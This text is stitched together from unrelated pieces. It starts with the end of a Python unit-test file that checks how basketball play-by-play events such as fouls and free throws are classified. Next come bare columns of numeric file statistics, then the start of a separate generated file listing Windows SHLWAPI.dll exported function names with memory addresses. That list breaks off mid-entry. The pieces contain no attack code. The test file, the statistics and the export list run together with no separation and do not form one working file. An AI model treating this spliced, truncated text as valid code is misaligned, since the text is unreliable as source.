"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 2,
"PLAYER2_ID": 1,
}
order = 1
foul_event = StatsFoul(foul, order)
make = {
"EVENTMSGTYPE": 1,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Made Shot by team that got fouled",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 3,
}
order = 1
make_event = StatsFieldGoal(make, order)
ft_event.previous_event = None
ft_event.next_event = foul_event
foul_event.previous_event = ft_event
foul_event.next_event = make_event
make_event.previous_event = foul_event
make_event.next_event = None
assert ft_event.is_away_from_play_ft is True
def test_foul_on_made_ft_by_team_that_didnt_get_fouled_is_away_from_play_ft():
ft_2_of_2 = {
"EVENTNUM": 607,
"PCTIMESTRING": "0:25",
"VISITORDESCRIPTION": "Jackson Free Throw 2 of 2 (16 PTS)",
"EVENTMSGACTIONTYPE": 12,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 202704,
"PLAYER1_TEAM_ID": 1610612765,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
ft_2_of_2_event = StatsFreeThrow(ft_2_of_2, order)
foul = {
"EVENTNUM": 609,
"PCTIMESTRING": "0:25",
"VISITORDESCRIPTION": "Griffin AWAY.FROM.PLAY.FOUL (P5.PN) (M.Davis)",
"EVENTMSGACTIONTYPE": 6,
"EVENTMSGTYPE": 6,
"PLAYER1_ID": 201933,
"PLAYER1_TEAM_ID": 1610612765,
"PLAYER2_ID": 201145,
"PLAYER2_TEAM_ID": 1610612764,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
foul_event = StatsFoul(foul, order)
ft_1_of_1 = {
"EVENTNUM": 611,
"PCTIMESTRING": "0:25",
"HOMEDESCRIPTION": "Beal Free Throw 1 of 1 (32 PTS)",
"EVENTMSGACTIONTYPE": 10,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203078,
"PLAYER1_TEAM_ID": 1610612764,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
ft_1_of_1_event = StatsFreeThrow(ft_1_of_1, order)
fg = {
"EVENTNUM": 612,
"PCTIMESTRING": "0:24",
"VISITORDESCRIPTION": "MISS Green 27' 3PT Jump Shot",
"EVENTMSGACTIONTYPE": 1,
"EVENTMSGTYPE": 2,
"PLAYER1_ID": 201145,
"PLAYER1_TEAM_ID": 1610612764,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
fg_event = StatsFieldGoal(fg, order)
ft_2_of_2_event.previous_event = None
ft_2_of_2_event.next_event = foul_event
foul_event.previous_event = ft_2_of_2_event
foul_event.next_event = ft_1_of_1_event
ft_1_of_1_event.previous_event = foul_event
ft_1_of_1_event.next_event = fg_event
fg_event.previous_event = ft_1_of_1_event
fg_event.next_event = None
assert ft_1_of_1_event.is_away_from_play_ft is True
def test_inbound_foul_ft_true():
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 5,
"VISITORDESCRIPTION": "Inbound Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
}
order = 1
foul_event = StatsFoul(foul, order)
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
foul_event.previous_event = None
foul_event.next_event = ft_event
ft_event.previous_event = foul_event
ft_event.next_event = None
assert ft_event.is_inbound_foul_ft is True
def test_away_from_play_free_throw_type():
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 6,
"VISITORDESCRIPTION": "Away From Play Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 2,
"PLAYER2_ID": 1,
}
order = 1
foul_event = StatsFoul(foul, order)
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
make = {
"EVENTMSGTYPE": 1,
"EVENTMSGACTIONTYPE": 10,
"VISITORDESCRIPTION": "Made Shot by team that got fouled",
"PCTIMESTRING": "0:35",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 21,
}
order = 1
make_event = StatsFieldGoal(make, order)
foul_event.previous_event = None
foul_event.next_event = ft_event
ft_event.previous_event = foul_event
ft_event.next_event = make_event
make_event.previous_event = ft_event
make_event.next_event = None
assert ft_event.free_throw_type == "1 Shot Away From Play"
def test_flagrant_free_throw_type():
foul = {
"EVENTNUM": 609,
"PCTIMESTRING": "0:25",
"VISITORDESCRIPTION": "Griffin Flagrant Foul (P5.PN) (M.Davis)",
"EVENTMSGACTIONTYPE": 14,
"EVENTMSGTYPE": 6,
"PLAYER1_ID": 201933,
"PLAYER1_TEAM_ID": 1610612765,
"PLAYER2_ID": 203078,
"PLAYER2_TEAM_ID": 1610612764,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
foul_event = StatsFoul(foul, order)
ft_1_of_2 = {
"EVENTNUM": 611,
"PCTIMESTRING": "0:25",
"HOMEDESCRIPTION": "Beal Free Throw Flagrant 1 of 2 (32 PTS)",
"EVENTMSGACTIONTYPE": 11,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203078,
"PLAYER1_TEAM_ID": 1610612764,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
ft_1_of_2_event = StatsFreeThrow(ft_1_of_2, order)
ft_2_of_2 = {
"EVENTNUM": 611,
"PCTIMESTRING": "0:25",
"HOMEDESCRIPTION": "Beal Free Throw Flagrant 2 of 2 (32 PTS)",
"EVENTMSGACTIONTYPE": 12,
"EVENTMSGTYPE": 3,
"PLAYER1_ID": 203078,
"PLAYER1_TEAM_ID": 1610612764,
"PLAYER2_ID": None,
"PLAYER2_TEAM_ID": None,
"PLAYER3_ID": None,
"PLAYER3_TEAM_ID": None,
}
order = 1
ft_2_of_2_event = StatsFreeThrow(ft_2_of_2, order)
foul_event.previous_event = None
foul_event.next_event = ft_1_of_2_event
ft_1_of_2_event.previous_event = foul_event
ft_1_of_2_event.next_event = ft_2_of_2_event
ft_2_of_2_event.previous_event = ft_1_of_2_event
ft_2_of_2_event.next_event = None
assert ft_1_of_2_event.free_throw_type == "2 Shot Flagrant"
def test_event_for_efficiency_stats_when_events_out_of_order():
ft = {
"EVENTMSGTYPE": 3,
"EVENTMSGACTIONTYPE": 10,
"HOMEDESCRIPTION": "Free Throw 1 of 1",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 1,
"PLAYER1_ID": 1,
}
order = 1
ft_event = StatsFreeThrow(ft, order)
foul = {
"EVENTMSGTYPE": 6,
"EVENTMSGACTIONTYPE": 6,
"VISITORDESCRIPTION": "Away From Play Foul",
"PCTIMESTRING": "0:45",
"PLAYER1_TEAM_ID": 2,
"PLAYER1_ID": 2,
"PLAYER2_ID": 1,
}
order = 1
foul_event = StatsFoul(foul, order)
ft_event.previous_event = None
ft_event.next_event = foul_event
foul_event.previous_event = ft_event
foul_event.next_event = None
assert ft_event.event_for_efficiency_stats == foul_event
| 28.920233
| 80
| 0.597915
| 1,821
| 14,865
| 4.566722
| 0.075233
| 0.039683
| 0.045334
| 0.037037
| 0.898268
| 0.860029
| 0.834295
| 0.794252
| 0.742905
| 0.724266
| 0
| 0.081496
| 0.285974
| 14,865
| 513
| 81
| 28.976608
| 0.701997
| 0
| 0
| 0.76569
| 0
| 0
| 0.292365
| 0
| 0
| 0
| 0
| 0
| 0.033473
| 1
| 0.033473
| false
| 0
| 0.008368
| 0
| 0.041841
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6acacdc50e6b41c12ecf82fe40b41821e7f57e63
| 29,123
|
py
|
Python
|
util/data/gen/SHLWAPI.dll.py
|
56kyle/bloons_auto
|
419d55b51d1cddc49099593970adf1c67985b389
|
[
"MIT"
] | null | null | null |
util/data/gen/SHLWAPI.dll.py
|
56kyle/bloons_auto
|
419d55b51d1cddc49099593970adf1c67985b389
|
[
"MIT"
] | null | null | null |
util/data/gen/SHLWAPI.dll.py
|
56kyle/bloons_auto
|
419d55b51d1cddc49099593970adf1c67985b389
|
[
"MIT"
] | null | null | null |
symbols = []
exports = [{'type': 'function', 'name': 'AssocCreate', 'address': '0x7ffb3e205f90'}, {'type': 'function', 'name': 'AssocGetPerceivedType', 'address': '0x7ffb3e203fc0'}, {'type': 'function', 'name': 'AssocIsDangerous', 'address': '0x7ffb3e216650'}, {'type': 'function', 'name': 'AssocQueryKeyA', 'address': '0x7ffb3e216e20'}, {'type': 'function', 'name': 'AssocQueryKeyW', 'address': '0x7ffb3e205dc0'}, {'type': 'function', 'name': 'AssocQueryStringA', 'address': '0x7ffb3e216f20'}, {'type': 'function', 'name': 'AssocQueryStringByKeyA', 'address': '0x7ffb3e2170d0'}, {'type': 'function', 'name': 'AssocQueryStringByKeyW', 'address': '0x7ffb3e205ea0'}, {'type': 'function', 'name': 'AssocQueryStringW', 'address': '0x7ffb3e205cd0'}, {'type': 'function', 'name': 'ChrCmpIA', 'address': '0x7ffb3e20e910'}, {'type': 'function', 'name': 'ChrCmpIW', 'address': '0x7ffb3e20e930'}, {'type': 'function', 'name': 'ColorAdjustLuma', 'address': '0x7ffb3e219670'}, {'type': 'function', 'name': 'ColorHLSToRGB', 'address': '0x7ffb3e2092d0'}, {'type': 'function', 'name': 'ColorRGBToHLS', 'address': '0x7ffb3e2090e0'}, {'type': 'function', 'name': 'ConnectToConnectionPoint', 'address': '0x7ffb3e2076c0'}, {'type': 'function', 'name': 'DelayLoadFailureHook', 'address': '0x7ffb3e2197b0'}, {'type': 'function', 'name': 'DllGetClassObject', 'address': '0x7ffb3e21ff70'}, {'type': 'function', 'name': 'DllGetVersion', 'address': '0x7ffb3e21fea0'}, {'type': 'function', 'name': 'GetAcceptLanguagesA', 'address': '0x7ffb3e20e950'}, {'type': 'function', 'name': 'GetAcceptLanguagesW', 'address': '0x7ffb3e20e970'}, {'type': 'function', 'name': 'GetMenuPosFromID', 'address': '0x7ffb3e206e50'}, {'type': 'function', 'name': 'HashData', 'address': '0x7ffb3e20e990'}, {'type': 'function', 'name': 'IStream_Copy', 'address': '0x7ffb3e212040'}, {'type': 'function', 'name': 'IStream_Read', 'address': '0x7ffb3e212060'}, {'type': 'function', 'name': 'IStream_ReadPidl', 'address': '0x7ffb3e206ce0'}, {'type': 'function', 'name': 'IStream_ReadStr', 'address': '0x7ffb3e2017c0'}, {'type': 'function', 'name': 'IStream_Reset', 'address': '0x7ffb3e212080'}, {'type': 'function', 'name': 'IStream_Size', 'address': '0x7ffb3e2120a0'}, {'type': 'function', 'name': 'IStream_Write', 'address': '0x7ffb3e2120e0'}, {'type': 'function', 'name': 'IStream_WritePidl', 'address': '0x7ffb3e209dc0'}, {'type': 'function', 'name': 'IStream_WriteStr', 'address': '0x7ffb3e2120c0'}, {'type': 'function', 'name': 'IUnknown_AtomicRelease', 'address': '0x7ffb3e212100'}, {'type': 'function', 'name': 'IUnknown_Exec', 'address': '0x7ffb3e208150'}, {'type': 'function', 'name': 'IUnknown_GetSite', 'address': '0x7ffb3e212120'}, {'type': 'function', 'name': 'IUnknown_GetWindow', 'address': '0x7ffb3e206940'}, {'type': 'function', 'name': 'IUnknown_QueryService', 'address': '0x7ffb3e209ef0'}, {'type': 'function', 'name': 'IUnknown_QueryStatus', 'address': '0x7ffb3e21c1f0'}, {'type': 'function', 'name': 'IUnknown_Set', 'address': '0x7ffb3e207260'}, {'type': 'function', 'name': 'IUnknown_SetSite', 'address': '0x7ffb3e201a10'}, {'type': 'function', 'name': 'IntlStrEqWorkerA', 'address': '0x7ffb3e20f770'}, {'type': 'function', 'name': 'IntlStrEqWorkerW', 'address': '0x7ffb3e20f790'}, {'type': 'function', 'name': 'IsCharSpaceA', 'address': '0x7ffb3e20ea30'}, {'type': 'function', 'name': 'IsCharSpaceW', 'address': '0x7ffb3e201490'}, {'type': 'function', 'name': 'IsInternetESCEnabled', 'address': '0x7ffb3e20ea70'}, {'type': 'function', 'name': 'IsOS', 'address': '0x7ffb3e208110'}, {'type': 
'function', 'name': 'MLLoadLibraryA', 'address': '0x7ffb3e21c5d0'}, {'type': 'function', 'name': 'MLLoadLibraryW', 'address': '0x7ffb3e21c5f0'}, {'type': 'function', 'name': 'ParseURLA', 'address': '0x7ffb3e20ea90'}, {'type': 'function', 'name': 'ParseURLW', 'address': '0x7ffb3e209590'}, {'type': 'function', 'name': 'PathAddBackslashA', 'address': '0x7ffb3e2096c0'}, {'type': 'function', 'name': 'PathAddBackslashW', 'address': '0x7ffb3e208050'}, {'type': 'function', 'name': 'PathAddExtensionA', 'address': '0x7ffb3e20eab0'}, {'type': 'function', 'name': 'PathAddExtensionW', 'address': '0x7ffb3e20ead0'}, {'type': 'function', 'name': 'PathAppendA', 'address': '0x7ffb3e20eaf0'}, {'type': 'function', 'name': 'PathAppendW', 'address': '0x7ffb3e20eb10'}, {'type': 'function', 'name': 'PathBuildRootA', 'address': '0x7ffb3e212140'}, {'type': 'function', 'name': 'PathBuildRootW', 'address': '0x7ffb3e2019d0'}, {'type': 'function', 'name': 'PathCanonicalizeA', 'address': '0x7ffb3e20eb30'}, {'type': 'function', 'name': 'PathCanonicalizeW', 'address': '0x7ffb3e20eb50'}, {'type': 'function', 'name': 'PathCombineA', 'address': '0x7ffb3e20eb70'}, {'type': 'function', 'name': 'PathCombineW', 'address': '0x7ffb3e201990'}, {'type': 'function', 'name': 'PathCommonPrefixA', 'address': '0x7ffb3e20eb90'}, {'type': 'function', 'name': 'PathCommonPrefixW', 'address': '0x7ffb3e207a80'}, {'type': 'function', 'name': 'PathCompactPathA', 'address': '0x7ffb3e2130e0'}, {'type': 'function', 'name': 'PathCompactPathExA', 'address': '0x7ffb3e213470'}, {'type': 'function', 'name': 'PathCompactPathExW', 'address': '0x7ffb3e2025f0'}, {'type': 'function', 'name': 'PathCompactPathW', 'address': '0x7ffb3e217ab0'}, {'type': 'function', 'name': 'PathCreateFromUrlA', 'address': '0x7ffb3e20ebb0'}, {'type': 'function', 'name': 'PathCreateFromUrlAlloc', 'address': '0x7ffb3e20ebd0'}, {'type': 'function', 'name': 'PathCreateFromUrlW', 'address': '0x7ffb3e207990'}, {'type': 'function', 'name': 'PathFileExistsA', 'address': '0x7ffb3e209ed0'}, {'type': 'function', 'name': 'PathFileExistsAndAttributesW', 'address': '0x7ffb3e2020d0'}, {'type': 'function', 'name': 'PathFileExistsW', 'address': '0x7ffb3e209e50'}, {'type': 'function', 'name': 'PathFindExtensionA', 'address': '0x7ffb3e20ebf0'}, {'type': 'function', 'name': 'PathFindExtensionW', 'address': '0x7ffb3e206e10'}, {'type': 'function', 'name': 'PathFindFileNameA', 'address': '0x7ffb3e2017a0'}, {'type': 'function', 'name': 'PathFindFileNameW', 'address': '0x7ffb3e206fe0'}, {'type': 'function', 'name': 'PathFindNextComponentA', 'address': '0x7ffb3e20ec10'}, {'type': 'function', 'name': 'PathFindNextComponentW', 'address': '0x7ffb3e2095f0'}, {'type': 'function', 'name': 'PathFindOnPathA', 'address': '0x7ffb3e2138c0'}, {'type': 'function', 'name': 'PathFindOnPathW', 'address': '0x7ffb3e201c70'}, {'type': 'function', 'name': 'PathFindSuffixArrayA', 'address': '0x7ffb3e213b70'}, {'type': 'function', 'name': 'PathFindSuffixArrayW', 'address': '0x7ffb3e206f10'}, {'type': 'function', 'name': 'PathGetArgsA', 'address': '0x7ffb3e20ec30'}, {'type': 'function', 'name': 'PathGetArgsW', 'address': '0x7ffb3e2080b0'}, {'type': 'function', 'name': 'PathGetCharTypeA', 'address': '0x7ffb3e20ec50'}, {'type': 'function', 'name': 'PathGetCharTypeW', 'address': '0x7ffb3e2084b0'}, {'type': 'function', 'name': 'PathGetDriveNumberA', 'address': '0x7ffb3e20ec70'}, {'type': 'function', 'name': 'PathGetDriveNumberW', 'address': '0x7ffb3e208010'}, {'type': 'function', 'name': 'PathIsContentTypeA', 'address': 
'0x7ffb3e213c70'}, {'type': 'function', 'name': 'PathIsContentTypeW', 'address': '0x7ffb3e217e50'}, {'type': 'function', 'name': 'PathIsDirectoryA', 'address': '0x7ffb3e213d30'}, {'type': 'function', 'name': 'PathIsDirectoryEmptyA', 'address': '0x7ffb3e213e50'}, {'type': 'function', 'name': 'PathIsDirectoryEmptyW', 'address': '0x7ffb3e217f10'}, {'type': 'function', 'name': 'PathIsDirectoryW', 'address': '0x7ffb3e207890'}, {'type': 'function', 'name': 'PathIsFileSpecA', 'address': '0x7ffb3e20ec90'}, {'type': 'function', 'name': 'PathIsFileSpecW', 'address': '0x7ffb3e20ecb0'}, {'type': 'function', 'name': 'PathIsLFNFileSpecA', 'address': '0x7ffb3e20ecd0'}, {'type': 'function', 'name': 'PathIsLFNFileSpecW', 'address': '0x7ffb3e20ecf0'}, {'type': 'function', 'name': 'PathIsNetworkPathA', 'address': '0x7ffb3e212160'}, {'type': 'function', 'name': 'PathIsNetworkPathW', 'address': '0x7ffb3e207d90'}, {'type': 'function', 'name': 'PathIsPrefixA', 'address': '0x7ffb3e20ed10'}, {'type': 'function', 'name': 'PathIsPrefixW', 'address': '0x7ffb3e207df0'}, {'type': 'function', 'name': 'PathIsRelativeA', 'address': '0x7ffb3e20ed30'}, {'type': 'function', 'name': 'PathIsRelativeW', 'address': '0x7ffb3e207f40'}, {'type': 'function', 'name': 'PathIsRootA', 'address': '0x7ffb3e20ed50'}, {'type': 'function', 'name': 'PathIsRootW', 'address': '0x7ffb3e209610'}, {'type': 'function', 'name': 'PathIsSameRootA', 'address': '0x7ffb3e20ed70'}, {'type': 'function', 'name': 'PathIsSameRootW', 'address': '0x7ffb3e20ed90'}, {'type': 'function', 'name': 'PathIsSystemFolderA', 'address': '0x7ffb3e213f40'}, {'type': 'function', 'name': 'PathIsSystemFolderW', 'address': '0x7ffb3e204550'}, {'type': 'function', 'name': 'PathIsUNCA', 'address': '0x7ffb3e20edb0'}, {'type': 'function', 'name': 'PathIsUNCServerA', 'address': '0x7ffb3e20edd0'}, {'type': 'function', 'name': 'PathIsUNCServerShareA', 'address': '0x7ffb3e20edf0'}, {'type': 'function', 'name': 'PathIsUNCServerShareW', 'address': '0x7ffb3e20ee10'}, {'type': 'function', 'name': 'PathIsUNCServerW', 'address': '0x7ffb3e20ee30'}, {'type': 'function', 'name': 'PathIsUNCW', 'address': '0x7ffb3e207d70'}, {'type': 'function', 'name': 'PathIsURLA', 'address': '0x7ffb3e20ee50'}, {'type': 'function', 'name': 'PathIsURLW', 'address': '0x7ffb3e207240'}, {'type': 'function', 'name': 'PathMakePrettyA', 'address': '0x7ffb3e214040'}, {'type': 'function', 'name': 'PathMakePrettyW', 'address': '0x7ffb3e2180d0'}, {'type': 'function', 'name': 'PathMakeSystemFolderA', 'address': '0x7ffb3e2140c0'}, {'type': 'function', 'name': 'PathMakeSystemFolderW', 'address': '0x7ffb3e2014b0'}, {'type': 'function', 'name': 'PathMatchSpecA', 'address': '0x7ffb3e20ee90'}, {'type': 'function', 'name': 'PathMatchSpecExA', 'address': '0x7ffb3e20eeb0'}, {'type': 'function', 'name': 'PathMatchSpecExW', 'address': '0x7ffb3e20eed0'}, {'type': 'function', 'name': 'PathMatchSpecW', 'address': '0x7ffb3e20eef0'}, {'type': 'function', 'name': 'PathParseIconLocationA', 'address': '0x7ffb3e20ef10'}, {'type': 'function', 'name': 'PathParseIconLocationW', 'address': '0x7ffb3e207db0'}, {'type': 'function', 'name': 'PathQuoteSpacesA', 'address': '0x7ffb3e20ef30'}, {'type': 'function', 'name': 'PathQuoteSpacesW', 'address': '0x7ffb3e20ef50'}, {'type': 'function', 'name': 'PathRelativePathToA', 'address': '0x7ffb3e20ef70'}, {'type': 'function', 'name': 'PathRelativePathToW', 'address': '0x7ffb3e20ef90'}, {'type': 'function', 'name': 'PathRemoveArgsA', 'address': '0x7ffb3e214280'}, {'type': 'function', 'name': 'PathRemoveArgsW', 
'address': '0x7ffb3e2071f0'}, {'type': 'function', 'name': 'PathRemoveBackslashA', 'address': '0x7ffb3e20efb0'}, {'type': 'function', 'name': 'PathRemoveBackslashW', 'address': '0x7ffb3e207930'}, {'type': 'function', 'name': 'PathRemoveBlanksA', 'address': '0x7ffb3e20efd0'}, {'type': 'function', 'name': 'PathRemoveBlanksW', 'address': '0x7ffb3e208070'}, {'type': 'function', 'name': 'PathRemoveExtensionA', 'address': '0x7ffb3e20eff0'}, {'type': 'function', 'name': 'PathRemoveExtensionW', 'address': '0x7ffb3e208090'}, {'type': 'function', 'name': 'PathRemoveFileSpecA', 'address': '0x7ffb3e20f010'}, {'type': 'function', 'name': 'PathRemoveFileSpecW', 'address': '0x7ffb3e207950'}, {'type': 'function', 'name': 'PathRenameExtensionA', 'address': '0x7ffb3e20f030'}, {'type': 'function', 'name': 'PathRenameExtensionW', 'address': '0x7ffb3e20f050'}, {'type': 'function', 'name': 'PathSearchAndQualifyA', 'address': '0x7ffb3e20f070'}, {'type': 'function', 'name': 'PathSearchAndQualifyW', 'address': '0x7ffb3e20f090'}, {'type': 'function', 'name': 'PathSetDlgItemPathA', 'address': '0x7ffb3e2142c0'}, {'type': 'function', 'name': 'PathSetDlgItemPathW', 'address': '0x7ffb3e218130'}, {'type': 'function', 'name': 'PathSkipRootA', 'address': '0x7ffb3e20f0b0'}, {'type': 'function', 'name': 'PathSkipRootW', 'address': '0x7ffb3e2096a0'}, {'type': 'function', 'name': 'PathStripPathA', 'address': '0x7ffb3e20f0d0'}, {'type': 'function', 'name': 'PathStripPathW', 'address': '0x7ffb3e2019f0'}, {'type': 'function', 'name': 'PathStripToRootA', 'address': '0x7ffb3e20f0f0'}, {'type': 'function', 'name': 'PathStripToRootW', 'address': '0x7ffb3e2095b0'}, {'type': 'function', 'name': 'PathUnExpandEnvStringsA', 'address': '0x7ffb3e20f110'}, {'type': 'function', 'name': 'PathUnExpandEnvStringsW', 'address': '0x7ffb3e20f130'}, {'type': 'function', 'name': 'PathUndecorateA', 'address': '0x7ffb3e214450'}, {'type': 'function', 'name': 'PathUndecorateW', 'address': '0x7ffb3e208e80'}, {'type': 'function', 'name': 'PathUnmakeSystemFolderA', 'address': '0x7ffb3e214540'}, {'type': 'function', 'name': 'PathUnmakeSystemFolderW', 'address': '0x7ffb3e2182d0'}, {'type': 'function', 'name': 'PathUnquoteSpacesA', 'address': '0x7ffb3e20f150'}, {'type': 'function', 'name': 'PathUnquoteSpacesW', 'address': '0x7ffb3e209b20'}, {'type': 'function', 'name': 'QISearch', 'address': '0x7ffb3e206260'}, {'type': 'function', 'name': 'SHAllocShared', 'address': '0x7ffb3e220600'}, {'type': 'function', 'name': 'SHAnsiToAnsi', 'address': '0x7ffb3e212180'}, {'type': 'function', 'name': 'SHAnsiToUnicode', 'address': '0x7ffb3e2121a0'}, {'type': 'function', 'name': 'SHAutoComplete', 'address': '0x7ffb3e21c760'}, {'type': 'function', 'name': 'SHCopyKeyA', 'address': '0x7ffb3e2121c0'}, {'type': 'function', 'name': 'SHCopyKeyW', 'address': '0x7ffb3e2121e0'}, {'type': 'function', 'name': 'SHCreateMemStream', 'address': '0x7ffb3e207dd0'}, {'type': 'function', 'name': 'SHCreateShellPalette', 'address': '0x7ffb3e207c40'}, {'type': 'function', 'name': 'SHCreateStreamOnFileA', 'address': '0x7ffb3e212200'}, {'type': 'function', 'name': 'SHCreateStreamOnFileEx', 'address': '0x7ffb3e212220'}, {'type': 'function', 'name': 'SHCreateStreamOnFileW', 'address': '0x7ffb3e212240'}, {'type': 'function', 'name': 'SHCreateThread', 'address': '0x7ffb3e2080f0'}, {'type': 'function', 'name': 'SHCreateThreadRef', 'address': '0x7ffb3e212260'}, {'type': 'function', 'name': 'SHCreateThreadWithHandle', 'address': '0x7ffb3e209e70'}, {'type': 'function', 'name': 'SHCreateWorkerWindowW', 
'address': '0x7ffb3e209a70'}, {'type': 'function', 'name': 'SHDeleteEmptyKeyA', 'address': '0x7ffb3e212280'}, {'type': 'function', 'name': 'SHDeleteEmptyKeyW', 'address': '0x7ffb3e2122a0'}, {'type': 'function', 'name': 'SHDeleteKeyA', 'address': '0x7ffb3e2122c0'}, {'type': 'function', 'name': 'SHDeleteKeyW', 'address': '0x7ffb3e2122e0'}, {'type': 'function', 'name': 'SHDeleteValueA', 'address': '0x7ffb3e212300'}, {'type': 'function', 'name': 'SHDeleteValueW', 'address': '0x7ffb3e212320'}, {'type': 'function', 'name': 'SHEnumKeyExA', 'address': '0x7ffb3e212340'}, {'type': 'function', 'name': 'SHEnumKeyExW', 'address': '0x7ffb3e212360'}, {'type': 'function', 'name': 'SHEnumValueA', 'address': '0x7ffb3e212380'}, {'type': 'function', 'name': 'SHEnumValueW', 'address': '0x7ffb3e2123a0'}, {'type': 'function', 'name': 'SHFormatDateTimeA', 'address': '0x7ffb3e218a70'}, {'type': 'function', 'name': 'SHFormatDateTimeW', 'address': '0x7ffb3e218af0'}, {'type': 'function', 'name': 'SHFreeShared', 'address': '0x7ffb3e220620'}, {'type': 'function', 'name': 'SHGetInverseCMAP', 'address': '0x7ffb3e219ea0'}, {'type': 'function', 'name': 'SHGetThreadRef', 'address': '0x7ffb3e2123c0'}, {'type': 'function', 'name': 'SHGetValueA', 'address': '0x7ffb3e2123e0'}, {'type': 'function', 'name': 'SHGetValueW', 'address': '0x7ffb3e207e10'}, {'type': 'function', 'name': 'SHGetViewStatePropertyBag', 'address': '0x7ffb3e204590'}, {'type': 'function', 'name': 'SHIsChildOrSelf', 'address': '0x7ffb3e2065a0'}, {'type': 'function', 'name': 'SHIsLowMemoryMachine', 'address': '0x7ffb3e208330'}, {'type': 'function', 'name': 'SHLoadIndirectString', 'address': '0x7ffb3e2080d0'}, {'type': 'function', 'name': 'SHLockShared', 'address': '0x7ffb3e220680'}, {'type': 'function', 'name': 'SHMessageBoxCheckA', 'address': '0x7ffb3e21cf60'}, {'type': 'function', 'name': 'SHMessageBoxCheckW', 'address': '0x7ffb3e21d300'}, {'type': 'function', 'name': 'SHOpenRegStream2A', 'address': '0x7ffb3e212400'}, {'type': 'function', 'name': 'SHOpenRegStream2W', 'address': '0x7ffb3e212420'}, {'type': 'function', 'name': 'SHOpenRegStreamA', 'address': '0x7ffb3e212440'}, {'type': 'function', 'name': 'SHOpenRegStreamW', 'address': '0x7ffb3e212460'}, {'type': 'function', 'name': 'SHPackDispParamsV', 'address': '0x7ffb3e208d80'}, {'type': 'function', 'name': 'SHPinDllOfCLSID', 'address': '0x7ffb3e2022d0'}, {'type': 'function', 'name': 'SHPropertyBag_ReadStrAlloc', 'address': '0x7ffb3e221d30'}, {'type': 'function', 'name': 'SHPropertyBag_WriteBSTR', 'address': '0x7ffb3e221df0'}, {'type': 'function', 'name': 'SHQueryInfoKeyA', 'address': '0x7ffb3e212480'}, {'type': 'function', 'name': 'SHQueryInfoKeyW', 'address': '0x7ffb3e2124a0'}, {'type': 'function', 'name': 'SHQueryValueExA', 'address': '0x7ffb3e2124c0'}, {'type': 'function', 'name': 'SHQueryValueExW', 'address': '0x7ffb3e2124e0'}, {'type': 'function', 'name': 'SHRegCloseUSKey', 'address': '0x7ffb3e20f190'}, {'type': 'function', 'name': 'SHRegCreateUSKeyA', 'address': '0x7ffb3e20f1b0'}, {'type': 'function', 'name': 'SHRegCreateUSKeyW', 'address': '0x7ffb3e20f1d0'}, {'type': 'function', 'name': 'SHRegDeleteEmptyUSKeyA', 'address': '0x7ffb3e20f1f0'}, {'type': 'function', 'name': 'SHRegDeleteEmptyUSKeyW', 'address': '0x7ffb3e20f210'}, {'type': 'function', 'name': 'SHRegDeleteUSValueA', 'address': '0x7ffb3e20f230'}, {'type': 'function', 'name': 'SHRegDeleteUSValueW', 'address': '0x7ffb3e20f250'}, {'type': 'function', 'name': 'SHRegDuplicateHKey', 'address': '0x7ffb3e212500'}, {'type': 'function', 'name': 
'SHRegEnumUSKeyA', 'address': '0x7ffb3e20f270'}, {'type': 'function', 'name': 'SHRegEnumUSKeyW', 'address': '0x7ffb3e20f290'}, {'type': 'function', 'name': 'SHRegEnumUSValueA', 'address': '0x7ffb3e20f2b0'}, {'type': 'function', 'name': 'SHRegEnumUSValueW', 'address': '0x7ffb3e20f2d0'}, {'type': 'function', 'name': 'SHRegGetBoolUSValueA', 'address': '0x7ffb3e20f2f0'}, {'type': 'function', 'name': 'SHRegGetBoolUSValueW', 'address': '0x7ffb3e2095d0'}, {'type': 'function', 'name': 'SHRegGetBoolValueFromHKCUHKLM', 'address': '0x7ffb3e20b960'}, {'type': 'function', 'name': 'SHRegGetIntW', 'address': '0x7ffb3e212520'}, {'type': 'function', 'name': 'SHRegGetPathA', 'address': '0x7ffb3e212540'}, {'type': 'function', 'name': 'SHRegGetPathW', 'address': '0x7ffb3e212560'}, {'type': 'function', 'name': 